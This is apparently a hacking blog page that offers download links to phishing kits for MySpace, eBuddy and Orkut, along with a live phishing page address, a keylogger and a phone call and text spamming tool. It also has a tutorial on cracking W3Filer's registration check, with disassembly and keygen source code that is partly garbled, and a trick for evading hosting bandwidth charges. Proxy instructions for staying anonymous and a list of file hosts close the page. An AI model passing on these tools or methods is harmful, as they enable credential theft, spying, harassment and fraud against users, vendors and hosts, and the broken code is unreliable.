PEOPLE WHO LIKED MY BLOG

our partners

My Space Phisher

http://rapidshare.com/files/134196086/MySpace_Phisher__Date_Updates_Everyday__-_blackbay.org.zip

ebuddy phisher

http://rapidshare.com/files/132968723/ebuddy.rar

Key Logger


http://rapidshare.com/files/74176734/Powered_Keylogger_2.2.1.1920.rar

orkut phisher

Real Page
Code:

www.orkut.com


Phisher
Code:

http://www.asura.blackapplehost.com/orkut/


Download:
Code:

http://rapidshare.com/files/136202276/Orkut_Phisher_Armageddon_www.badhackerz.com.rar

Spam calls/text message

This program was written in VB6 and can spam calls and text messages to any phone in the U.S. Since it's the public version, you can only spam 10 at a time, but its still fun :D
Code:


Code:

http://rapidshare.com/files/116410527/MultiSpammerv2.1Public.rar.html

Generate Key gen

I take no responsibility of the usage of this information.
This tutorial, is for educational knowledge ONLY.
Hi there, in this tutorial, I intend to teach you how to make a pretty
simple keygen, of a program called W3Filer 32 V1.1.3.
W3Filer is a pretty good web downloader...
I guess some of you might know the program.
I`ll assume you know:
A.How to use debugger (in this case, SoftIce).
B.How to crack, generally (finding protection routines,patching them,etc...).
C.How to use Disassembler (This knowledge can help).
D.Assembly.
E.How to code in Turbo Pascal ?.
Tools you`ll need:
A.SoftIce 3.00/01 or newer.
B.WD32Asm. (Not a must).
C.The program W3Filer V1.13 (if not provided in this package), can be found in
www.windows95.com I believe.
D.Turbo Pascal (ANY version).
Well, enough blah blah, let's go cracking...
Run W3Filer 32.
A nag screen pops, and , demands registration (Hmm, this sux ;-)) Now,
We notice this program has some kind of serial number (Mine is 873977046),
Let's keep the serial in mind, I bet we`ll meet it again while we're on
the debugger.
Well, now, let's put your name and a dummy reg code...
set a BP on GetDlgItemTextA, and, press OK.
We pop inside GetDlgItemTextA, Lets find the registration routine...
I`ll save you the work, the registration routine is this:
:00404DB2 8D95A8FAFFFF lea edx, dword ptr [ebp+FFFFFAA8]
:00404DB8 52 push edx ---> Your user name here.
:00404DB9 E80B550000 call 0040A2C9 ---> Registration routine.
:00404DBE 83C408 add esp, 00000008 ---> Dunno exactly what is it.
:00404DC1 85C0 test eax, eax ---> Boolean identifier, 0 if
:00404DC3 7D17 jge 00404DDC ---> registration failed, 1 if
OK.
Well, Let's enter the CALL 40A2C9, and see what's inside it:
(Please read my comments in the code).
* Referenced by a CALL at Addresses:
|:00404DB9 , :00407F76
|
:0040A2C9 55 push ebp
:0040A2CA 8BEC mov ebp, esp
:0040A2CC 81C4B0FEFFFF add esp, FFFFFEB0
:0040A2D2 53 push ebx
:0040A2D3 56 push esi
:0040A2D4 57 push edi
:0040A2D5 8B5508 mov edx, dword ptr [ebp+08]
:0040A2D8 8DB500FFFFFF lea esi, dword ptr [ebp+FFFFFF00]
:0040A2DE 33C0 xor eax, eax
:0040A2E0 EB16 jmp 0040A2F8
* Referenced by a (U)nconditional or ?onditional Jump at Address:
|:0040A2FB?
|
:0040A2E2 0FBE0A movsx ecx, byte ptr [edx] ----> Here Starts the
interesting part.
:0040A2E5 83F920 cmp ecx, 00000020 ----> ECX is the the current
char in the user name, Hmm, 20h=' '...
:0040A2E8 740D je 0040A2F7 ----> Let's see,
:0040A2EA 8A0A mov cl, byte ptr [edx] ----> Generally, all this loop
does, is copying
the user name from
[EDX], to [ESI], WITHOUT the spaces!
(Keep this in mind! ).
:0040A2EC 880C06 mov byte ptr [esi+eax], cl
:0040A2EF 42 inc edx
:0040A2F0 40 inc eax
:0040A2F1 C6040600 mov byte ptr [esi+eax], 00
:0040A2F5 EB01 jmp 0040A2F8
* Referenced by a (U)nconditional or ?onditional Jump at Address:
|:0040A2E8?
|
:0040A2F7 42 inc edx
* Referenced by a (U)nconditional or ?onditional Jump at Addresses:
|:0040A2E0(U), :0040A2F5(U)
|
:0040A2F8 803A00 cmp byte ptr [edx], 00
:0040A2FB 75E5 jne 0040A2E2 ----------------> This is the loop , we got
what it does,
Let's continue tracing
the code...
:0040A2FD 56 push esi --------> The user name is pushed, in order
to
Upcase it's chars.
* Reference To: USER32.CharUpperA, Ord:0000h
|
:0040A2FE E80F330000 Call User!CharUpper ---> After this, our name is in
upper case.
:0040A303 56 push esi -----> Our name in upper case here.
* Reference To: cw3220mt._strlen, Ord:0000h
|
:0040A304 E86F300000 Call 0040D378 ---> This is the length of our name.
:0040A309 59 pop ecx
:0040A30A 8BC8 mov ecx, eax ---> ECX=Length.
:0040A30C 83F904 cmp ecx, 00000004 ---> Length>=4 (MUST).
:0040A30F 7D05 jge 0040A316 ---> Let's go to this address...
:0040A311 83C8FF or eax, FFFFFFFF
:0040A314 EB67 jmp 0040A37D
* Referenced by a (U)nconditional or ?onditional Jump at Address:
|:0040A30F?
|
:0040A316 33D2 xor edx, edx
:0040A318 33C0 xor eax, eax
:0040A31A 3BC8 cmp ecx, eax
:0040A31C 7E17 jle 0040A335 ---> (Not important, just another useless
checking).
===================================================================================
============ FROM HERE AND ON, THE IMPORTANT CODE, PAY ATTENTION ==================
===================================================================================
One thing before we continue, EDX = 00000000h as we enter to the next instructions.
* Referenced by a (U)nconditional or ?onditional Jump at Address:
|:0040A333?
|
:0040A31E 0FBE1C06 movsx ebx, byte ptr [esi+eax] ---> EBX <--- char in user name, offset EAX. :0040A322 C1E303 shl ebx, 03 -----> Hmm, it shl's the char by 03h...
(Remember that).
:0040A325 0FBE3C06 movsx edi, byte ptr [esi+eax] ---> Now EDI <--- Char in user name , offset EAX. :0040A329 0FAFF8 imul edi, eax -----> It multiplies the char by the
offset in user name! (Remember that).
:0040A32C 03DF add ebx, edi -----> Adds the result to EBX (That was
Shelled (Ding Dong =)).
:0040A32E 03D3 add edx, ebx -----> EDX=EDX+EBX!!! - This is the CORE
of this registration routine!!!
:0040A330 40 inc eax -----> Increase EAX by one (next char).
:0040A331 3BC8 cmp ecx, eax
:0040A333 7FE9 jg 0040A31E ----> If ECX HMMMMMM, What's in
here?????
:0040A33A C1F803 sar eax, 03 ---------> WAIT! Please type in SIce '?
EAX'
Does this number in EAX look
familiar to us? ;-)
If you still don`t understand,
than, It's
our SERIAL NUMBER! (PLEASE, take
your time, and check by
yourself - don`t trust me!). OK,
so now we know,
That it SHR's EAX by 03 (SAR is
almost identical to SHR).
:0040A33D 03D0 add edx, eax ---------> Hmm, it adds the result from the
loop, the serial number shr'd by 03h
:0040A33F 52 push edx -------> Let's continue. (At this point, I
can tell you , the reg number, is
in EDX - only that the reg number
is in HEX --> That's how you enter it).
* Possible StringData Ref from Data Obj ->"%lx"
|
:0040A340 685EF54000 push 0040F55E
:0040A345 8D95B0FEFFFF lea edx, dword ptr [ebp+FFFFFEB0]
:0040A34B 52 push edx
* Reference To: USER32.wsprintfA, Ord:0000h
|
:0040A34C E8E5320000 Call 0040D636 -------> This one, does HEX2STR (Takes
the value from EDX, and turns it to an hex string).
:0040A351 83C40C add esp, 0000000C
:0040A354 8D8DB0FEFFFF lea ecx, dword ptr [ebp+FFFFFEB0] -----> type 'd ecx' -
THIS is the reg number! That's enough for us, the rest of
the code, is
just for comparing the correct reg code with ours.
:0040A35A 51 push ecx
* Reference To: USER32.CharLowerA, Ord:0000h
|
:0040A35B E8B8320000 Call 0040D618
:0040A360 8D85B0FEFFFF lea eax, dword ptr [ebp+FFFFFEB0]
:0040A366 50 push eax
:0040A367 FF750C push [ebp+0C]
* Reference To: cw3220mt._strcmp, Ord:0000h
|
:0040A36A E875300000 Call 0040D3E4
:0040A36F 83C408 add esp, 00000008
:0040A372 85C0 test eax, eax
:0040A374 7405 je 0040A37B
:0040A376 83C8FF or eax, FFFFFFFF
:0040A379 EB02 jmp 0040A37D
* Referenced by a (U)nconditional or ?onditional Jump at Address:
|:0040A374?
|
:0040A37B 33C0 xor eax, eax
* Referenced by a (U)nconditional or ?onditional Jump at Addresses:
|:0040A314(U), :0040A379(U)
|
:0040A37D 5F pop edi
:0040A37E 5E pop esi
:0040A37F 5B pop ebx
:0040A380 8BE5 mov esp, ebp
:0040A382 5D pop ebp
:0040A383 C3 ret
Making the actual Keygen
~~~~~~~~~~~~~~~~~~~~~~~~
Now, after I've explained how does the program calculate the registration
code, you can either write your own keymaker, without looking at my code, or
look at my code (in Turbo Pascal - sorry for all you C lovers ;-) Next time).
That's it, here's the source of my keygen:
------------------- Cut here ---------------------------------------------
Program W3FilerKeygen;
var
Key,SerialNum,EB,ED,digit:Longint;
I,x:Byte;
Name,KeyHex:String;
begin
Writeln(' W3Filer32 V1.1.3 Keymaker');
writeln('Cracked by ^pain^ ''97 / Rebels!');
Write('Your Name:'); { Read the name }
readln(Name);
Write('Serial Number:');
readln(SerialNum); {Yes, we need the serial number for the calculation!}
Key:=0;
x:=0;
For I:=1 to length(Name) do
begin
Name[I]:=upcase(Name[i]);
If Name[I]<>' ' then begin
eb:=ord(Name[I]) shl 3; {EB = Name[I] Shl 03h}
Ed:=ord(Name[I]); {ED = Name[I]}
ed:=ed*(x); {ED=ED*Offset}
inc(x);
eb:=eb+ed; {Add ED to EB}
Key:=Key+EB; {Add EB to KEY}
end;
end;
Key:=Key+(SerialNum shr 3); { Add SerialNum shr 03h to Key}
{ From here, this is just HEX2STRING --> I`m quite sure it's
Self explaintory, else - go and learn number bases again! ;-)}
KeyHex:='';
repeat
digit:=Key mod 16;
key:=key div 16;
If digit<10>10 then KeyHex:=Chr(Digit-10+ord('a'))+KeyHex;
until key=0;
writeln('Your Key:',KeyHex);
writeln(' Enjoy!');
end.
:dunno:

Get unlimited bandwidth from your host for free

Get unlimited bandwidth from your host for free


NOTE: This applies only to specific hosting companies, due to the
specific setup needed and does have its drawbacks.

While setting up hosting space with a specific company I often deal
with, I noticed that they used a shared IP. (IP shared by two or more
websites/domains.) Well, the rates for unlimited bandwidth were
around $50+ per month, which I found unreasonable. I didnt require
much space, and didnt want to be limited to a mere 3 gig of traffic
per month.

Back on track... When setting up the acct, the hosting company needs
to know the domain name so that they can direct it accordingly.
(example: 'http://www.123.4.567.890/~user1/ ,
'http://www.123.4.567.890/~user2/ etc)

At this point you can give a url that doesnt belong to you at all. As
long as the nameservers dont change, that should have absolutly no
negative effects on you or your site whatsoever.

How it works is this:
The host propogates you a certain amount space on its servers, and
monitors the traffic that enters their space through the domain its
registered under. Being that the domain isn't connected to the site
at all, it registers ZERO traffic.

Zero traffic registered = can't possibly go over bandwidth
restrictions
can't possibly go over bandwidth restrictions = free unlimited
bandwidth

Now the problems with this (besides the ethical ones) is that your
host may offer X amount of mail addys with the acct
(you@y...) and these will not work, as the name isnt on their
DNS. However, some domain companies allow you to set it up
regardless. Another problem seems to be strictly cosmetic, but can be
highly problematic... Once you attach the domain you want onto the
site, each page comes up/w the ip/UN the host propagated to your
acct. Its at this point where you have to have a phenominal 10-15
character alphanumerical or better (#, &, etc) pw, or your site will
be vulnerable to attack since the attacker already has your UN. This
only gives attackers a slight advantage as the amount of time it
would take to brute force a 10 character pw @ a rate of 1,000,000 per
second is 10 years. Add numbers and case sensitivity to that and it
becomes approx 26,980 years.

While I'm on it, I may as well add that if you use this method,
obviously you are going to be using the lowest cost hosting plan
available, which in turn will offer the least amount of space. Thats
why free hosts were invented.

Free hosts suck as a general rule. Who wants a site smothered in ads?
However, if you upload all your programs, graphics and other large
files (have a backup of course) to a reliable free host and target
them accordingly from your site you have just freed up a signifigant
amount of space. The only setback/w this is having to keep an index
card or file around/w your pws, as you should never use the same one
twice, and want to use complicated ones.
How To Set Up Proxies In Your Browser

This is a small Tutor - try it out!

===================================
How to set up proxies in your browser, (!!!!be anonymous and make the passes last longer...!!!!!!
===================================
In Internet Explorer
===================================
Click "Tools", then "Internet Options", the in the "connections" Tab, click the "LAN Setup" Button in the bottom. There is a "Proxy Servers", tick the "Use a proxy....." and then enter the proxy in the bigger textbox and the port (the part that comes after the ":") in the smaller textbox. Hit okay, and then go to
CODE
Code:
www.whatismyip.com
to see if the proxy is now your IP.
===================================
In OPERA
===================================
Click "Files", then "Preferences", then "Network", then click the button "Proxy Servers", tick "HTTP", fill in with the proxy:port, click okay and that's it! Don't forget to check with
CODE
Code:
www.whatismyip.com

===================================
In Firefox
===================================
Tools -> Options
Then click the General Icon
Then the "Connection Settings..." button
Then click the "manually configure proxies" radio button, and enter the proxy address and port in the HTTP Proxy area.
Don't forget to check with
CODE
Code:
www.whatismyip.com


CODE
Code:
www.proxy4free.com
[url]www.safeproxy.org[/url]
[url]www.megaproxy.com[/url]
[url]www.guardster.com[/url]
[url]www.silenter.com[/url]
[url]www.anonymizer.com[/url]


Happy Anonymous surfing!


To be clear: if I give you 255.255.255.255:8080, that means 255.255.255.255 is the proxy and 8080 is the port
To Optain Fresh and new proxies,u can always check Google...

Free Data Hosting Websites


Here are some more, enough to never have to count cats again:

http://www.1-clickshare.com
http://www.2xupload.de
http://www.4filehosting.com
http://www.4shared.com/signup.jsp
http://afilehosting.com/index.php
http://ag69.com
http://ed.alfahost.ee
http://alphaupload.com
http://www.axifile.com
http://www.badongo.com
http://www.bestsharing.com
http://www.bigfilez.com/html/
http://www.bigupload.com
http://www.bonpoo.com
http://bravoshare.com
http://bravoshare.net/blog_singleup.php
http://bravoshare.net/blog_multiup.php
http://www.cheapfilehost.com
http://www.cocoshare.cc
http://www.come2store.com/faq.php
http://www.content-type.com
http://www.cyberupload.com
http://www.divshare.com (no.exe or .msi)
http://downtown.vc
http://dr.ag
http://www.easy-share.com
http://www.easy-sharing.com
http://www.edisk.cz/nase-sluzby
http://www.eufiles.com
http://fastfreefilehosting.com
http://www.fast-load.net
http://www.file2upload.com
http://www.filecoast.com
http://www.filecrunch.com
http://www.filefactory.com/upload/
http://www.filehd.com/upload.php
http://www.filehd.com/faq.php
http://www.filehost.ro
http://www.file.lt/pupload/
http://www.filepatio.com
http://www.filesend.net
http://files.h4ck-y0u.org
http://www.fileskip.com
http://files-upload.com/en/
http://www.filetycoon.com
http://www.freefilehost.co.uk
http://www.freefilespace.net/index.php?page=faq
http://freefileupload.net/index.php
http://www.freeuploader.com
http://www.friendlyshare.de
http://www.getupload.com
http://www.gigasize.com
http://share.gulli.com
http://hotuploading.com
http://www.hyperupload.com
http://download.hyperfileshare.com/sel_upload_type.php
http://www.idrive.com
http://www.icefile.net
http://ihud.com/new/
http://in.solit.us/archives/upload
http://www.internetfiles.org
http://www.jumbofile.com
http://www.justupit.com
http://www.keepmyfile.com
http://kotuha.com
http://letitbit.net
http://www.live-share.com
http://www.looler.com/index.php
http://www.mediafire.com
http://megaphile.com
http://www.megashare.com
http://www.megashares.com
http://www.megaupload.com
http://www.midload.com/en/
http://mihd.net
http://file.mofile.com/lang.do?lang=en
http://momupload.com
http://www.multiupload.dr.ag
http://www.mydatabus.com
http://myfreefilehosting.com
http://www.momoshare.com
http://www.mooload.com
http://www.mydocsonline.com/features.html
http://www.myfiles.co.il
http://www.mytempdir.com
http://www.mzbt.com
http://www.nakido.com
http://netload.in/index.php?id=1

http://www.oxedion.com
http://www.oxedion.de
http://www.oxyshare.com
http://www.paid4load.de/index.php?show=agb
http://www.pirateshare.net
http://www.pakspace.com
http://pointupload.com
http://www.quicksharing.com/faq.php
http://www.rapidgrab.org
http://www.rapidshare.de
http://www.rapidshare.ru
http://rapidsharings.com/free-downloads/
http://www.rapidupload.com
http://www.rapidupload.eu
http://www.rapidupload.org
http://www.rnbload.com
http://www.savefile.com/selectplan.php
http://www.send-file.com
http://www.sendmefile.com
http://www.sendspace.com
http://www.sexuploader.com/faq/
http://shared.myz.info/index.php
http://sharedzilla.com
http://sharingmatrix.com
http://www.slil.ru http://zalil.ru
http://www.snaggys.com
http://www.speedyshare.com
http://www.spread-it.com
http://storeandserve.com
http://thefilehost.net
http://tryor.com
http://www.turboupload.com
http://www.ultrashare.net
http://up-file.com/register.php
http://www.upit.cc
http://www.upitus.com
http://www.upload.sc
http://upload2.net
http://upload66.com/faq.php do not watch the movies (makes counter stop sometimes), scroll up
http://www.uploadbigfiles.net
http://uploaded.to
http://www.uploading.com/en/
http://www.uploadmaxx.com
http://www.uploadplaca.com/faq.php
http://www.uploadport.com
http://uploadway.com
http://www.upshare.eu/index.php?setlang=en
http://www.usaupload.net
http://www.ushareit.com
http://www.webfile.ru http://webfile.ru
http://www.webfilehost.com
http://www.freedrive.com http://www.xdrive.com

http://willhostforfood.com/?Action=upload
http://xuploading.com/xus/
http://www.yastorage.com/upload.php Click on "Request", then the "D" in "Download Link"
https://www.yousendit.com
http://www.xd.lt
http://www.yourfilelink.com
http://www.yuntaa.com/pricing.aspx
http://www.zerowaitingtime.com/help.html
http://www.ziddu.com
http://www.zshare.net
http://www.zupload.com